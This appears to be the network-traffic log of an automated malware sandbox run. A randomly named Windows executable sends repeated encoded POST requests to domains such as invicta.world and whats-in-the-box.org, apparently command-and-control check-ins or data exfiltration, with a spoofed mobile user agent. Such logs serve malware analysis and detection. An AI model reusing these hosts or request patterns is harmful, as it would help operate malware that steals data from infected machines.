                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UP/oXrOJKx5Px23h5aSJS+oKMRSneW00UJk4HMw8N9IbD/BEJLmbJrcK3IzmqRJiTImNebP27gJiT5sU3vUkKA==
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  Sep 25, 2024 09:58:46.820379972 CEST333INData Raw: 62 39 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                  Data Ascii: b9b7<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                  Sep 25, 2024 09:58:46.820400953 CEST1220INData Raw: 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69
                                                                                  Data Ascii: ; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if
                                                                                  Sep 25, 2024 09:58:46.820420980 CEST1220INData Raw: 69 6e 67 22 26 26 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 21 3d 3d 22 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73
                                                                                  Data Ascii: ing"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.s
                                                                                  Sep 25, 2024 09:58:46.820451975 CEST1220INData Raw: 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3d 3d 6f 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f
                                                                                  Data Ascii: (h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-
                                                                                  Sep 25, 2024 09:58:46.820589066 CEST1220INData Raw: 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 6a 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                                                                                  Data Ascii: 1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v(
                                                                                  Sep 25, 2024 09:58:46.820615053 CEST1220INData Raw: 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77
                                                                                  Data Ascii: ment.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidd
                                                                                  Sep 25, 2024 09:58:46.820635080 CEST1220INData Raw: 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70
                                                                                  Data Ascii: a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpSt
                                                                                  Sep 25, 2024 09:58:46.820653915 CEST1220INData Raw: 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70
                                                                                  Data Ascii: tion"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&
                                                                                  Sep 25, 2024 09:58:46.820672989 CEST1220INData Raw: 73 69 6f 6e 3a 31 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22
                                                                                  Data Ascii: sion:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandl
                                                                                  Sep 25, 2024 09:58:46.820693016 CEST1220INData Raw: 47 70 70 53 74 75 62 28 22 5f 5f 67 70 70 22 29 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74
                                                                                  Data Ascii: GppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.inastra.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.inastra.online/px.js?ch=2"></script><s


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  63192.168.11.204981913.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:52.233793974 CEST813OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  64192.168.11.204982013.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:54.881755114 CEST833OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 53 43 4b 73 43 6b 6c 6b 6b 4c 4b 6a 4e 36 38 64 54 6b 4e 2b 52 69 68 36 64 41 59 6b 53 4e 4a 31 42 48 62 6b 70 36 34 2b 5a 66 34 58 53 73 4d 67 55 7a 69 72 30 6b 6e 58 6e 7a 72 39 55 66 73 6c 55 31 67 64 56 6b 72 57 78 32 59 37 6c 78 68 73 77 44 68 33 4a 36 70 4f 2f 39 7a 2f 58 4f 74 7a 49 2b 62 50 37 37 41 41 37 6e 48 6a 30 2f 73 63 50 63 68 70 37 34 65 2f 65 4e 63 49 37 78 31 35 31 79 70 51 45 4b 4d 2f 38 73 66 68 47 70 36 53 33 36 2b 30 69 4b 78 73 69 77 61 6e 37 2f 6b 69 50 63 62 2b 44 33 37 63 4e 37 51 66 73 3d
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  65192.168.11.204982113.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:57.515466928 CEST6445OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 4b 43 4b 65 4b 6b 6a 44 51 4c 4c 6a 4e 36 79 39 54 68 4e 2b 52 61 68 36 6c 45 59 6b 57 37 4a 33 4a 48 61 47 52 36 74 38 78 66 78 58 53 73 46 41 55 32 39 62 31 2b 6e 58 33 33 72 2b 73 66 73 6c 55 31 67 62 52 6b 75 79 74 32 61 37 6c 2b 72 4d 77 50 6c 33 4a 53 70 50 61 4b 7a 2b 58 77 74 44 6f 2b 62 76 72 37 47 69 54 6e 50 6a 30 35 76 63 4f 62 68 6f 47 36 65 2b 33 30 63 49 6d 6d 31 36 46 79 71 47 6c 78 49 4c 49 4f 64 53 43 6c 31 52 48 4b 32 58 37 5a 79 50 37 4c 4c 57 66 2f 75 57 44 75 62 38 4c 46 2b 4d 35 6b 4a 66 53 36 71 45 59 38 45 61 6e 30 58 66 73 77 69 7a 65 73 52 64 54 55 36 4d 59 6e 4d 6e 36 51 38 63 61 63 33 65 51 59 54 6d 78 57 47 6e 64 6f 6f 46 32 34 4a 62 77 2f 4e 72 7a 51 6e 67 72 74 55 55 57 61 56 75 65 51 6e 38 74 34 35 65 38 55 65 4c 38 72 7a 39 70 55 77 4c 51 7a 4d 55 4c 4b 4a 34 6c 76 52 67 4b 58 31 63 48 2b 55 64 4e 43 58 77 36 65 75 33 51 69 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMKCKeKkjDQLLjN6y9ThN+Rah6lEYkW7J3JHaGR6t8xfxXSsFAU29b1+nX33r+sfslU1gbRkuyt2a7l+rMwPl3JSpPaKz+XwtDo+bvr7GiTnPj05vcObhoG6e+30cImm16FyqGlxILIOdSCl1RHK2X7ZyP7LLWf/uWDub8LF+M5kJfS6qEY8Ean0XfswizesRdTU6MYnMn6Q8cac3eQYTmxWGndooF24Jbw/NrzQngrtUUWaVueQn8t45e8UeL8rz9pUwLQzMULKJ4lvRgKX1cH+UdNCXw6eu3QiGAquazuC98MrBy1VHbVHkM7ulofYY251dbT6iygXqBeYQCqxnPotM1c8CwJbWSWv2ihn31C2ZOwiv8xL0yQ5YqwfDBJUA57ItDEjqmusA2Pur4cTV0JyXIT/D9LNZcCmlCEUJliehmmtkeixWiFs+zAiOs7MVI4FsVwIRdUF/nFtm9xuHe3iFk1Zkywm3AM4V9wvoOfHPKRvgQbOfClHNjh5pAmqL316oYMjKoO6heyUOu/st3E1HWFxTh5XfOHMnXVFr8Y4gh5pmsC8XtyoNBlViHX02hMVRY3olu2oAFLzlC7krCFABnHVUVfLxB3B99xnwYVxNjKrtz5cj/GYKzsfRz2fEmdKKEzwWpYLkL0S68KfA1wwUj4lkCrAoWn5aBtbF5GzQpqLVg4OgM/OcQhZ37SMkFmuOSydHdDcWemM8BjAOurMG3OVO0UrZGGjMY8vUM/ZXtohv6jZcifQW1dTh19KTQ0n03svlzKNEzhF2k71lSJajhGFCt1rL6yf7+X7aPj7upe+sUFwz2wfcVnCv3uU8DYWsKClUXzBFJoUTWmkJ9fcdyyZEkN6JLF1/DX5qjZb9bHBUCaGZJelQbtylC8PmjKjQPRAV6QWKVf1ixiT4zT0+Q9GOifLyteoSJ8tT8tG4vYhKMKoyTqZEDaf6RvDeaNBxs [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:57.515521049 CEST1537OUTData Raw: 35 6a 78 42 66 75 48 75 69 56 69 64 6a 53 44 74 69 67 47 42 67 50 32 64 70 51 62 43 62 45 75 65 73 57 62 35 63 33 49 6c 55 30 71 30 56 62 45 53 69 55 2b 7a 6d 53 51 51 4d 7a 66 52 2b 47 62 49 78 79 77 75 71 2f 63 36 76 62 32 56 38 75 51 55 39 65
                                                                                  Data Ascii: 5jxBfuHuiVidjSDtigGBgP2dpQbCbEuesWb5c3IlU0q0VbESiU+zmSQQMzfR+GbIxywuq/c6vb2V8uQU9eu/NBJKLq8qjd1aIBuS3VUKB7V9UY+i4wTZiO/5+StyBtK4Opm3fJc87wkzC/siBBk2Zi/mUUXZt4y+AtMjya7+mnykcJoPkJG5z4P6m4dfYtfcV4g0wMI9Q8EyksU99rhGWYDUUJynzWS6GOmprk91+pWOkPdkuo4


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  66192.168.11.204982213.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:00.155721903 CEST547OUTGET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:00.261560917 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 55 54 72 32 56 51 4d 56 61 4e 6b 6e 41 50 68 76 38 70 4f 35 48 55 74 2f 61 53 44 2f 4f 75 41 76 59 66 75 66 6f 6e 78 57 63 75 7a 71 4b 59 7a 6a 74 30 30 45 53 48 4e 4f 70 38 4f 5a 64 34 4e 59 70 50 68 59 41 68 4b 45 66 46 42 79 41 6c 39 2f 77 2b 46 63 75 6d 47 58 4f 46 70 35 38 4d 4d 44 68 56 50 71 6b 39 35 36 34 6b 78 4e 38 4f 63 38 6b 57 30 38 4e 2b 73 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  67192.168.11.20498233.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:05.385103941 CEST834OUTPOST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  68192.168.11.20498243.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:08.025620937 CEST854OUTPOST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  69192.168.11.20498253.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:10.665514946 CEST1289OUTPOST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 [TRUNCATED]
